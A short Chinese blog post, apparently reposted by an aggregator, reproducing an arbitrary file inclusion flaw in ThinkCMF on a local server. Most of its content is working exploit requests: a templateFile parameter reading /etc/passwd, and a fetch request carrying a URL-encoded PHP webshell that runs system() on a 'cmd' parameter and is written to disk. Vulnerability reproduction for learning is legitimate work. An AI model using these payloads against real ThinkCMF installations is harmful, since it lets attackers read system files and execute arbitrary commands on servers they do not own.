ThinkCMF任意文件包含漏洞复现

Posted kn1fe

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了ThinkCMF任意文件包含漏洞复现相关的知识,希望对你有一定的参考价值。

这几天看到ThiknCMF存在任意文件包含漏洞,闲下来复现一下。

搭建环境,放到服务器上。

先来试试读取README文件

http://127.0.0.1/?a=display&templateFile=REMADE.md

技术图片

 

 

emmm,好使,再来读读系统文件

http://127.0.0.1/?a=display&templateFile=/etc/passwd

技术图片

 

 真香,尝试一下文件包含webshell

http://127.0.0.1/?a=fetch&tem ... %27%27&content=<php>file_put_contents(‘0a30e0d61182dbb7c1eed5135787fb84.php‘,‘%3c%3f%70%68%70%0d%0a%65%63%68%6f%20%6d%64%35%28%22%54%68%69%6e%6b%43%4d%46%22%29%3b%0d%0a%20%20%20%20%69%66%28%69%73%73%65%74%28%24%5f%52%45%51%55%45%53%54%5b%22%63%6d%64%22%5d%29%29%7b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%65%63%68%6f%20%22%3c%70%72%65%3e%22%3b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%24%63%6d%64%20%3d%20%28%24%5f%52%45%51%55%45%53%54%5b%22%63%6d%64%22%5d%29%3b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%73%79%73%74%65%6d%28%24%63%6d%64%29%3b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%65%63%68%6f%20%22%3c%2f%70%72%65%3e%22%3b%0d%0a%20%20%20%20%20%20%20%20%20%20%20%20%64%69%65%3b%0d%0a%20%20%20%20%7d%0d%0a%70%68%70%69%6e%66%6f%28%29%3b%0d%0a%3f%3e‘)</php>

技术图片

 

 

继续学习继续学习!!!

以上是关于ThinkCMF任意文件包含漏洞复现的主要内容,如果未能解决你的问题,请参考以下文章

ThinkCMF_X1.6.0-X2.2.3框架任意内容包含漏洞的简单分析复现(附自动化验证脚本)

PbootCMS2.07前台任意文件包含漏洞(复现)

CVE-2020-1938漏洞复现

phpmyadmin文件包含漏洞复现(CVE-2018-12613)

Tomcat文件包含漏洞(CVE-2020-1938)复现

通达OA 任意文件上传+文件包含导致RCE漏洞复现